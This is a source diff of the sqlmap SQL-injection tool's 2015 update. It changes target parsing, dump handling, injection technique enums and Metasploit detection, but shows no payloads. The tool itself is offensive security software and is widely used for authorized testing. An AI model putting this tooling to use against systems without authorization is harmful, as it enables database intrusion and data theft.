         found = None
         name = mnemonic.split('=')[0].replace("-", "").strip()
         value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None
@@ -3134,7 +3316,10 @@ def expandMnemonics(mnemonics, parser, args):
                     if opt.startswith(name):
                         options[opt] = option
 
-            if name in options:
+            if not options:
+                warnMsg = "mnemonic '%s' can't be resolved" % name
+                logger.warn(warnMsg)
+            elif name in options:
                 found = name
                 debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
                 logger.debug(debugMsg)
@@ -3144,7 +3329,8 @@ def expandMnemonics(mnemonics, parser, args):
                 warnMsg += "Resolved to shortest of those ('%s')" % found
                 logger.warn(warnMsg)
 
-            found = options[found]
+            if found:
+                found = options[found]
         else:
             found = pointer.current[0]
             debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
@@ -3212,6 +3398,8 @@ def randomizeParameterValue(value):
 
     retVal = value
 
+    value = re.sub(r"%[0-9a-fA-F]{2}", "", value)
+
     for match in re.finditer('[A-Z]+', value):
         retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper())
 
@@ -3251,7 +3439,10 @@ def asciifyUrl(url, forceQuote=False):
         return url
 
     # idna-encode domain
-    hostname = parts.hostname.encode("idna")
+    try:
+        hostname = parts.hostname.encode("idna")
+    except LookupError:
+        hostname = parts.hostname.encode(UNICODE_ENCODING)
 
     # UTF8-quote the other parts. We check each part individually if
     # if needs to be quoted - that should catch some additional user
@@ -3340,18 +3531,18 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
     except UnicodeError:
         pass
     except ParseError:
-        warnMsg = "badly formed HTML at the given URL ('%s'). Going to filter it" % url
-        logger.warning(warnMsg)
-        response.seek(0)
-        filtered = _("".join(re.findall(FORM_SEARCH_REGEX, response.read())), response.geturl())
-        try:
-            forms = ParseResponse(filtered, backwards_compat=False)
-        except ParseError:
-            errMsg = "no success"
-            if raise_:
-                raise SqlmapGenericException(errMsg)
-            else:
-                logger.debug(errMsg)
+        if "<html" in (content or ""):
+            warnMsg = "badly formed HTML at the given URL ('%s'). Going to filter it" % url
+            logger.warning(warnMsg)
+            filtered = _("".join(re.findall(FORM_SEARCH_REGEX, content)), url)
+            try:
+                forms = ParseResponse(filtered, backwards_compat=False)
+            except ParseError:
+                errMsg = "no success"
+                if raise_:
+                    raise SqlmapGenericException(errMsg)
+                else:
+                    logger.debug(errMsg)
 
     if forms:
         for form in forms:
@@ -3384,8 +3575,17 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
                     logger.debug(debugMsg)
                     continue
 
-                target = (url, method, data, conf.cookie)
-                retVal.add(target)
+                # flag to know if we are dealing with the same target host
+                _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))
+
+                if conf.scope:
+                    if not re.search(conf.scope, url, re.I):
+                        continue
+                elif not _:
+                    continue
+                else:
+                    target = (url, method, data, conf.cookie, None)
+                    retVal.add(target)
     else:
         errMsg = "there were no forms found at the given target URL"
         if raise_:
@@ -3395,17 +3595,6 @@ def findPageForms(content, url, raise_=False, addToTargets=False):
 
     if addToTargets and retVal:
         for target in retVal:
-            url = target[0]
-
-            # flag to know if we are dealing with the same target host
-            _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))
-
-            if conf.scope:
-                if not re.search(conf.scope, url, re.I):
-                    continue
-            elif not _:
-                continue
-
             kb.targets.add(target)
 
     return retVal
@@ -3473,7 +3662,7 @@ def evaluateCode(code, variables=None):
     except KeyboardInterrupt:
         raise
     except Exception, ex:
-        errMsg = "an error occurred while evaluating provided code ('%s'). " % ex
+        errMsg = "an error occurred while evaluating provided code ('%s') " % ex.message
         raise SqlmapGenericException(errMsg)
 
 def serializeObject(object_):
@@ -3529,7 +3718,7 @@ def applyFunctionRecursively(value, function):
 
     return retVal
 
-def decodeHexValue(value):
+def decodeHexValue(value, raw=False):
     """
     Returns value decoded from DBMS specific hexadecimal representation
 
@@ -3544,7 +3733,7 @@ def decodeHexValue(value):
         if value and isinstance(value, basestring) and len(value) % 2 == 0:
             retVal = hexdecode(retVal)
 
-            if not kb.binaryField:
+            if not kb.binaryField and not raw:
                 if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"):
                     try:
                         retVal = retVal.decode("utf-16-le")
diff --git a/lib/core/convert.py b/lib/core/convert.py
index 4f48de409..8f7123a00 100644
--- a/lib/core/convert.py
+++ b/lib/core/convert.py
@@ -1,10 +1,11 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
+import base64
 import json
 import pickle
 import sys
@@ -20,7 +21,7 @@ def base64decode(value):
     'foobar'
     """
 
-    return value.decode("base64")
+    return base64.b64decode(value)
 
 def base64encode(value):
     """
@@ -30,7 +31,7 @@ def base64encode(value):
     'Zm9vYmFy'
     """
 
-    return value.encode("base64")[:-1].replace("\n", "")
+    return base64.b64encode(value)
 
 def base64pickle(value):
     """
@@ -41,6 +42,7 @@ def base64pickle(value):
     """
 
     retVal = None
+
     try:
         retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL))
     except:
@@ -63,7 +65,14 @@ def base64unpickle(value):
     'foobar'
     """
 
-    return pickle.loads(base64decode(value))
+    retVal = None
+
+    try:
+        retVal = pickle.loads(base64decode(value))
+    except TypeError: 
+        retVal = pickle.loads(base64decode(bytes(value)))
+
+    return retVal
 
 def hexdecode(value):
     """
@@ -137,17 +146,21 @@ def htmlunescape(value):
     return retVal
 
 def singleTimeWarnMessage(message):  # Cross-linked function
-    raise NotImplementedError
+    sys.stdout.write(message)
+    sys.stdout.write("\n")
+    sys.stdout.flush()
 
 def stdoutencode(data):
     retVal = None
 
     try:
+        data = data or ""
+
         # Reference: http://bugs.python.org/issue1602
         if IS_WIN:
-            output = data.encode("ascii", "replace")
+            output = data.encode(sys.stdout.encoding, "replace")
 
-            if output != data:
+            if '?' in output and '?' not in data:
                 warnMsg = "cannot properly display Unicode characters "
                 warnMsg += "inside Windows OS command prompt "
                 warnMsg += "(http://bugs.python.org/issue1602). All "
diff --git a/lib/core/data.py b/lib/core/data.py
index 6254ee46d..bb45072ff 100644
--- a/lib/core/data.py
+++ b/lib/core/data.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/datatype.py b/lib/core/datatype.py
index 6460fe443..29295727b 100644
--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -75,7 +75,7 @@ class AttribDict(dict):
         for attr in dir(self):
             if not attr.startswith('_'):
                 value = getattr(self, attr)
-                if not isinstance(value, (types.BuiltinFunctionType, types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
+                if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
                     setattr(retVal, attr, copy.deepcopy(value, memo))
 
         for key, value in self.items():
diff --git a/lib/core/decorators.py b/lib/core/decorators.py
index 8c46d38cc..8fa7b03b1 100644
--- a/lib/core/decorators.py
+++ b/lib/core/decorators.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/defaults.py b/lib/core/defaults.py
index d183e5377..6adecbe25 100644
--- a/lib/core/defaults.py
+++ b/lib/core/defaults.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
diff --git a/lib/core/dicts.py b/lib/core/dicts.py
index c9cd0cd51..b6a0ea2ba 100644
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -105,13 +105,22 @@ PGSQL_PRIVS = {
                     3: "catupd",
                 }
 
+# Reference(s): http://stackoverflow.com/a/17672504
+#               http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES
+
 FIREBIRD_PRIVS = {
                     "S": "SELECT",
                     "I": "INSERT",
                     "U": "UPDATE",
                     "D": "DELETE",
-                    "R": "REFERENCES",
+                    "R": "REFERENCE",
                     "E": "EXECUTE",
+                    "X": "EXECUTE",
+                    "A": "ALL",
+                    "M": "MEMBER",
+                    "T": "DECRYPT",
+                    "E": "ENCRYPT",
+                    "B": "SUBSCRIBE",
                 }
 
 DB2_PRIVS = {
@@ -207,6 +216,7 @@ POST_HINT_CONTENT_TYPES = {
                                 POST_HINT.MULTIPART: "multipart/form-data",
                                 POST_HINT.SOAP: "application/soap+xml",
                                 POST_HINT.XML: "application/xml",
+                                POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
                           }
 
 DEPRECATED_OPTIONS = {
@@ -214,6 +224,7 @@ DEPRECATED_OPTIONS = {
                         "--no-unescape": "use '--no-escape' instead",
                         "--binary": "use '--binary-fields' instead",
                         "--check-payload": None,
+                        "--check-waf": None,
                      }
 
 DUMP_DATA_PREPROCESS = {
diff --git a/lib/core/dump.py b/lib/core/dump.py
index ba3123ba9..4401f1742 100644
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -1,14 +1,15 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
 import cgi
-import codecs
+import hashlib
 import os
 import re
+import tempfile
 import threading
 
 from lib.core.common import Backend
@@ -21,6 +22,7 @@ from lib.core.common import openFile
 from lib.core.common import prioritySortColumns
 from lib.core.common import randomInt
 from lib.core.common import safeCSValue
+from lib.core.common import unicodeencode
 from lib.core.common import unsafeSQLIdentificatorNaming
 from lib.core.data import conf
 from lib.core.data import kb
@@ -32,12 +34,15 @@ from lib.core.enums import DBMS
 from lib.core.enums import DUMP_FORMAT
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapValueException
+from lib.core.exception import SqlmapSystemException
 from lib.core.replication import Replication
 from lib.core.settings import HTML_DUMP_CSS_STYLE
+from lib.core.settings import IS_WIN
 from lib.core.settings import METADB_SUFFIX
 from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
 from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
 from lib.core.settings import UNICODE_ENCODING
+from lib.core.settings import WINDOWS_RESERVED_NAMES
 from thirdparty.magic import magic
 
 from extra.safe2bin.safe2bin import safechardecode
@@ -66,19 +71,30 @@ class Dump(object):
         if kb.get("multiThreadMode"):
             self._lock.acquire()
 
-        self._outputFP.write(text)
+        try:
+            self._outputFP.write(text)
+        except IOError, ex:
+            errMsg = "error occurred while writing to log file ('%s')" % ex.message
+            raise SqlmapGenericException(errMsg)
 
         if kb.get("multiThreadMode"):
             self._lock.release()
 
         kb.dataOutputFlag = True
 
+    def flush(self):
+        if self._outputFP:
+            try:
+                self._outputFP.flush()
+            except IOError:
+                pass
+
     def setOutputFile(self):
         self._outputFile = os.path.join(conf.outputPath, "log")
         try:
-            self._outputFP = codecs.open(self._outputFile, "ab" if not conf.flushSession else "wb", UNICODE_ENCODING)
+            self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
         except IOError, ex:
-            errMsg = "error occurred while opening log file ('%s')" % ex
+            errMsg = "error occurred while opening log file ('%s')" % ex.message
             raise SqlmapGenericException(errMsg)
 
     def getOutputFile(self):
@@ -367,6 +383,7 @@ class Dump(object):
         rtable = None
         dumpFP = None
         appendToFile = False
+        warnFile = False
 
         if tableValues is None:
             return
@@ -380,15 +397,45 @@ class Dump(object):
             self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
             return
 
-        dumpDbPath = os.path.join(conf.dumpPath, re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
+        _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(db)))
+        if len(_) < len(db) or IS_WIN and db.upper() in WINDOWS_RESERVED_NAMES:
+            _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(db)))
+            dumpDbPath = os.path.join(conf.dumpPath, "%s-%s" % (_, hashlib.md5(unicodeencode(db)).hexdigest()[:8]))
+            warnFile = True
+        else:
+            dumpDbPath = os.path.join(conf.dumpPath, _)
 
         if conf.dumpFormat == DUMP_FORMAT.SQLITE:
             replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
         elif conf.dumpFormat in (DUMP_FORMAT.CSV, DUMP_FORMAT.HTML):
             if not os.path.isdir(dumpDbPath):
-                os.makedirs(dumpDbPath, 0755)
+                try:
+                    os.makedirs(dumpDbPath, 0755)
+                except (OSError, IOError), ex:
+                    try:
+                        tempDir = tempfile.mkdtemp(prefix="sqlmapdb")
+                    except IOError, _:
+                        errMsg = "unable to write to the temporary directory ('%s'). " % _
+                        errMsg += "Please make sure that your disk is not full and "
+                        errMsg += "that you have sufficient write permissions to "
+                        errMsg += "create temporary files and/or directories"
+                        raise SqlmapSystemException(errMsg)
+
+                    warnMsg = "unable to create dump directory "
+                    warnMsg += "'%s' (%s). " % (dumpDbPath, ex)
+                    warnMsg += "Using temporary directory '%s' instead" % tempDir
+                    logger.warn(warnMsg)
+
+                    dumpDbPath = tempDir
+
+            _ = re.sub(r"[^\w]", "_", normalizeUnicode(unsafeSQLIdentificatorNaming(table)))
+            if len(_) < len(table) or IS_WIN and table.upper() in WINDOWS_RESERVED_NAMES:
+                _ = unicodeencode(re.sub(r"[^\w]", "_", unsafeSQLIdentificatorNaming(table)))
+                dumpFileName = os.path.join(dumpDbPath, "%s-%s.%s" % (_, hashlib.md5(unicodeencode(table)).hexdigest()[:8], conf.dumpFormat.lower()))
+                warnFile = True
+            else:
+                dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (_, conf.dumpFormat.lower()))
 
-            dumpFileName = os.path.join(dumpDbPath, "%s.%s" % (unsafeSQLIdentificatorNaming(table), conf.dumpFormat.lower()))
             appendToFile = os.path.isfile(dumpFileName) and any((conf.limitStart, conf.limitStop))
             dumpFP = openFile(dumpFileName, "wb" if not appendToFile else "ab")
 
@@ -574,7 +621,12 @@ class Dump(object):
             else:
                 dataToDumpFile(dumpFP, "\n")
             dumpFP.close()
-            logger.info("table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName))
+
+            msg = "table '%s.%s' dumped to %s file '%s'" % (db, table, conf.dumpFormat, dumpFileName)
+            if not warnFile:
+                logger.info(msg)
+            else:
+                logger.warn(msg)
 
     def dbColumns(self, dbColumnsDict, colConsider, dbs):
         if hasattr(conf, "api"):
diff --git a/lib/core/enums.py b/lib/core/enums.py
index c7307c778..cb1b7b36f 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -74,6 +74,7 @@ class POST_HINT:
     JSON_LIKE = "JSON-like"
     MULTIPART = "MULTIPART"
     XML = "XML (generic)"
+    ARRAY_LIKE = "Array-like"
 
 class HTTPMETHOD:
     GET = "GET"
@@ -165,6 +166,7 @@ class HTTP_HEADER:
     COOKIE = "Cookie"
     SET_COOKIE = "Set-Cookie"
     HOST = "Host"
+    LOCATION = "Location"
     PRAGMA = "Pragma"
     PROXY_AUTHORIZATION = "Proxy-Authorization"
     PROXY_CONNECTION = "Proxy-Connection"
@@ -206,10 +208,10 @@ class PAYLOAD:
     SQLINJECTION = {
                         1: "boolean-based blind",
                         2: "error-based",
-                        3: "UNION query",
+                        3: "inline query",
                         4: "stacked queries",
                         5: "AND/OR time-based blind",
-                        6: "inline query",
+                        6: "UNION query",
                    }
 
     PARAMETER = {
@@ -248,10 +250,10 @@ class PAYLOAD:
     class TECHNIQUE:
         BOOLEAN = 1
         ERROR = 2
-        UNION = 3
+        QUERY = 3
         STACKED = 4
         TIME = 5
-        QUERY = 6
+        UNION = 6
 
     class WHERE:
         ORIGINAL = 1
@@ -338,3 +340,8 @@ class AUTH_TYPE:
     DIGEST = "digest"
     NTLM = "ntlm"
     PKI = "pki"
+
+class AUTOCOMPLETE_TYPE:
+    SQL = 0
+    OS = 1
+    SQLMAP = 2
diff --git a/lib/core/exception.py b/lib/core/exception.py
index eb2a6e297..faeff7c41 100644
--- a/lib/core/exception.py
+++ b/lib/core/exception.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -23,6 +23,9 @@ class SqlmapFilePathException(SqlmapBaseException):
 class SqlmapGenericException(SqlmapBaseException):
     pass
 
+class SqlmapInstallationException(SqlmapBaseException):
+    pass
+
 class SqlmapMissingDependence(SqlmapBaseException):
     pass
 
@@ -44,12 +47,21 @@ class SqlmapSilentQuitException(SqlmapBaseException):
 class SqlmapUserQuitException(SqlmapBaseException):
     pass
 
+class SqlmapShellQuitException(SqlmapBaseException):
+    pass
+
 class SqlmapSyntaxException(SqlmapBaseException):
     pass
 
+class SqlmapSystemException(SqlmapBaseException):
+    pass
+
 class SqlmapThreadException(SqlmapBaseException):
     pass
 
+class SqlmapTokenException(SqlmapBaseException):
+    pass
+
 class SqlmapUndefinedMethod(SqlmapBaseException):
     pass
 
diff --git a/lib/core/log.py b/lib/core/log.py
index 99b5626a4..3d3328545 100644
--- a/lib/core/log.py
+++ b/lib/core/log.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -41,4 +41,4 @@ FORMATTER = logging.Formatter("\r[%(asctime)s] [%(levelname)s] %(message)s", "%H
 
 LOGGER_HANDLER.setFormatter(FORMATTER)
 LOGGER.addHandler(LOGGER_HANDLER)
-LOGGER.setLevel(logging.WARN)
+LOGGER.setLevel(logging.INFO)
diff --git a/lib/core/option.py b/lib/core/option.py
index 9e9c94715..896446cd0 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -1,7 +1,7 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
+Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 
@@ -9,12 +9,14 @@ import cookielib
 import glob
 import inspect
 import logging
+import httplib
 import os
 import random
 import re
 import socket
 import string
 import sys
+import tempfile
 import threading
 import time
 import urllib2
@@ -51,7 +53,7 @@ from lib.core.common import readCachedFileContent
 from lib.core.common import readInput
 from lib.core.common import resetCookieJar
 from lib.core.common import runningAsAdmin
-from lib.core.common import sanitizeStr
+from lib.core.common import safeExpandUser
 from lib.core.common import setOptimize
 from lib.core.common import setPaths
 from lib.core.common import singleTimeWarnMessage
@@ -84,47 +86,41 @@ from lib.core.enums import WIZARD
 from lib.core.exception import SqlmapConnectionException
 from lib.core.exception import SqlmapFilePathException
 from lib.core.exception import SqlmapGenericException
+from lib.core.exception import SqlmapInstallationException
 from lib.core.exception import SqlmapMissingDependence
 from lib.core.exception import SqlmapMissingMandatoryOptionException
 from lib.core.exception import SqlmapMissingPrivileges
 from lib.core.exception import SqlmapSilentQuitException
 from lib.core.exception import SqlmapSyntaxException
+from lib.core.exception import SqlmapSystemException
 from lib.core.exception import SqlmapUnsupportedDBMSException
 from lib.core.exception import SqlmapUserQuitException
 from lib.core.log import FORMATTER
 from lib.core.optiondict import optDict
-from lib.core.settings import ACCESS_ALIASES
 from lib.core.settings import BURP_REQUEST_REGEX
 from lib.core.settings import BURP_XML_HISTORY_REGEX
 from lib.core.settings import CODECS_LIST_PAGE
 from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
 from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
-from lib.core.settings import DB2_ALIASES
+from lib.core.settings import DBMS_ALIASES
 from lib.core.settings import DEFAULT_PAGE_ENCODING
 from lib.core.settings import DEFAULT_TOR_HTTP_PORTS
 from lib.core.settings import DEFAULT_TOR_SOCKS_PORT
 from lib.core.settings import DUMMY_URL
-from lib.core.settings import FIREBIRD_ALIASES
 from lib.core.settings import INJECT_HERE_MARK
 from lib.core.settings import IS_WIN
 from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
+from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
 from lib.core.settings import LOCALHOST
-from lib.core.settings import MAXDB_ALIASES
 from lib.core.settings import MAX_CONNECT_RETRIES
 from lib.core.settings import MAX_NUMBER_OF_THREADS
-from lib.core.settings import MSSQL_ALIASES
-from lib.core.settings import MYSQL_ALIASES
 from lib.core.settings import NULL
-from lib.core.settings import ORACLE_ALIASES
 from lib.core.settings import PARAMETER_SPLITTING_REGEX
-from lib.core.settings import PGSQL_ALIASES
 from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
 from lib.core.settings import SITE
-from lib.core.settings import SQLITE_ALIASES
 from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
 from lib.core.settings import SUPPORTED_DBMS
 from lib.core.settings import SUPPORTED_OS
-from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import TIME_DELAY_CANDIDATES
 from lib.core.settings import UNION_CHAR_REGEX
 from lib.core.settings import UNKNOWN_DBMS_VERSION
@@ -134,6 +130,7 @@ from lib.core.settings import WEBSCARAB_SPLITTER
 from lib.core.threads import getCurrentThreadData
 from lib.core.update import update
 from lib.parse.configfile import configFileParser
+from lib.parse.payloads import loadBoundaries
 from lib.parse.payloads import loadPayloads
 from lib.parse.sitemap import parseSitemap
 from lib.request.basic import checkCharEncoding
@@ -228,7 +225,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
 
             if not(conf.scope and not re.search(conf.scope, url, re.I)):
                 if not kb.targets or url not in addedTargetUrls:
-                    kb.targets.add((url, method, None, cookie))
+                    kb.targets.add((url, method, None, cookie, None))
                     addedTargetUrls.add(url)
 
     def _parseBurpLog(content):
@@ -242,7 +239,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
                 for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
                     port, request = match.groups()
                     request = request.decode("base64")
-                    _ = re.search(r"%s:.+" % HTTP_HEADER.HOST, request)
+                    _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request)
                     if _:
                         host = _.group(0).strip()
                         if not re.search(r":\d+\Z", host):
@@ -280,6 +277,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
             params = False
             newline = None
             lines = request.split('\n')
+            headers = []
 
             for index in xrange(len(lines)):
                 line = lines[index]
@@ -291,7 +289,7 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
                 line = line.strip('\r')
                 match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None
 
-                if len(line) == 0 and method in (HTTPMETHOD.POST, HTTPMETHOD.PUT) and data is None:
+                if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
                     data = ""
                     params = True
 
@@ -329,14 +327,14 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
                             port = filterStringValue(splitValue[1], "[0-9]")
 
                     # Avoid to add a static content length header to
-                    # conf.httpHeaders and consider the following lines as
+                    # headers and consider the following lines as
                     # POSTed data
                     if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
                         params = True
 
                     # Avoid proxy and connection type related headers
                     elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
-                        conf.httpHeaders.append((getUnicode(key), getUnicode(value)))
+                        headers.append((getUnicode(key), getUnicode(value)))
 
                     if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
                         params = True
@@ -364,12 +362,17 @@ def _feedTargetsDict(reqFile, addedTargetUrls):
 
                 if not(conf.scope and not re.search(conf.scope, url, re.I)):
                     if not kb.targets or url not in addedTargetUrls:
-                        kb.targets.add((url, method, data, cookie))
+                        kb.targets.add((url, method, data, cookie, tuple(headers)))
                         addedTargetUrls.add(url)
 
-    fp = openFile(reqFile, "rb")
-
-    content = fp.read()
+    checkFile(reqFile)
+    try:
+        with openFile(reqFile, "rb") as f:
+            content = f.read()
+    except (IOError, OSError, MemoryError), ex:
+        errMsg = "something went wrong while trying "
+        errMsg += "to read the content of file '%s' ('%s')" % (reqFile, ex)
+        raise SqlmapSystemException(errMsg)
 
     if conf.scope:
         logger.info("using regular expression '%s' for filtering targets" % conf.scope)
@@ -409,7 +412,13 @@ def _loadQueries():
         return retVal
 
     tree = ElementTree()
-    tree.parse(paths.QUERIES_XML)
+    try:
+        tree.parse(paths.QUERIES_XML)
+    except Exception, ex:
+        errMsg = "something seems to be wrong with "
+        errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, ex)
+        errMsg += "sure that you haven't made any changes to it"
+        raise SqlmapInstallationException, errMsg
 
     for node in tree.findall("*"):
         queries[node.attrib['value']] = iterate(node)
@@ -469,11 +478,12 @@ def _adjustLoggingFormatter():
         return
 
     def format(record):
-        _ = boldifyMessage(FORMATTER._format(record))
-        if kb.prependFlag:
-            _ = "\n%s" % _
+        message = FORMATTER._format(record)
+        message = boldifyMessage(message)
+        if kb.get("prependFlag"):
+            message = "\n%s" % message
             kb.prependFlag = False
-        return _
+        return message
 
     FORMATTER._format = FORMATTER.format
     FORMATTER.format = format
@@ -489,7 +499,7 @@ def _setRequestFromFile():
 
     addedTargetUrls = set()
 
-    conf.requestFile = os.path.expanduser(conf.requestFile)
+    conf.requestFile = safeExpandUser(conf.requestFile)
 
     infoMsg = "parsing HTTP request from '%s'" % conf.requestFile
     logger.info(infoMsg)
@@ -569,14 +579,14 @@ def _setGoogleDorking():
         for link in links:
             link = urldecode(link)
             if re.search(r"(.*?)\?(.+)", link):
-                kb.targets.add((link, conf.method, conf.data, conf.cookie))
+                kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
             elif re.search(URI_INJECTABLE_REGEX, link, re.I):
                 if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork:
                     message = "do you want to scan only results containing GET parameters? [Y/n] "
                     test = readInput(message, default="Y")
                     kb.data.onlyGETs = test.lower() != 'n'
                 if not kb.data.onlyGETs or conf.googleDork:
-                    kb.targets.add((link, conf.method, conf.data, conf.cookie))
+                    kb.targets.add((link, conf.method, conf.data, conf.cookie, None))
 
         return links
 
@@ -612,7 +622,7 @@ def _setBulkMultipleTargets():
     if not conf.bulkFile:
         return
 
-    conf.bulkFile = os.path.expanduser(conf.bulkFile)
+    conf.bulkFile = safeExpandUser(conf.bulkFile)
 
     infoMsg = "parsing multiple targets list from '%s'" % conf.bulkFile
     logger.info(infoMsg)
@@ -626,7 +636,7 @@ def _setBulkMultipleTargets():
     for line in getFileItems(conf.bulkFile):
         if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line:
             found = True
-            kb.targets.add((line.strip(), None, None, None))
+            kb.targets.add((line.strip(), None, None, None, None))
 
     if not found and not conf.forms and not conf.crawlDepth:
         warnMsg = "no usable links found (with GET parameters)"
@@ -643,7 +653,7 @@ def _setSitemapTargets():
     for item in parseSitemap(conf.sitemapUrl):
         if re.match(r"[^ ]+\?(.+)", item, re.I):
             found = True
-            kb.targets.add((item.strip(), None, None, None))
+            kb.targets.add((item.strip(), None, None, None, None))
 
     if not found and not conf.forms and not conf.crawlDepth:
         warnMsg = "no usable links found (with GET parameters)"
@@ -756,8 +766,14 @@ def _setMetasploit():
 
     if conf.msfPath:
         for path in (conf.msfPath, os.path.join(conf.msfPath, "bin")):
-            if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("", "msfcli", "msfconsole", "msfencode", "msfpayload")):
+            if any(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfcli", "msfconsole")):
                 msfEnvPathExists = True
+                if all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfvenom",)):
+                    kb.oldMsf = False
+                elif all(os.path.exists(normalizePath(os.path.join(path, _))) for _ in ("msfencode", "msfpayload")):
+                    kb.oldMsf = True
+                else:
+                    msfEnvPathExists = False
                 conf.msfPath = path
                 break
 
@@ -788,15 +804,23 @@ def _setMetasploit():
         for envPath in envPaths:
